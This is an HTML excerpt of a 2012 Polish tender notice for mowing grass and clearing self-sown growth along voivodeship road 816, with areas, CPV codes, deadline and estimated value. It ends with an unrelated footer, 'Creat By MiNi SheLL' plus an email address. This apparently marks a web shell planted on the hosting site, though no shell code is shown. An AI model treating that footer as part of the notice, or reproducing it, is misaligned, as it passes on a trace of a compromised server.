<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednokrotne koszenie traw i chwastów oraz wycinka samosiewów i odrostów
      w pasie  drogowym drogi  wojewódzkiej Nr 816 Terespol - Kodeń - Sławatycze - 
      Włodawa - Dorohusk - Zosin od km 19+100 do km 59+300 
      i od km 63+240 do km 115+380
    w tym:
               - trawy i chwasty - 912 945 m2
               - samosiewy i odrosty - 78 285 m2
   zgodnie z przedmiarem i wymaganiami określonymi w  Specyfikacji Technicznej 
   w  sposób gwarantujący należytą jakość.
   2) Przed przystąpieniem do koszenie Wykonawca usunie z pasa drogowego kamienie, 
       gruz, puszki, butelki, papiery  itp., a następnie wywiezie je we własnym zakresie i na
       swój koszt na składowisko odpadów, lub przekaże firmie zajmującej się utylizacją
       odpadów.  
Szacunkowa wartość zadania netto: 91 179,90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com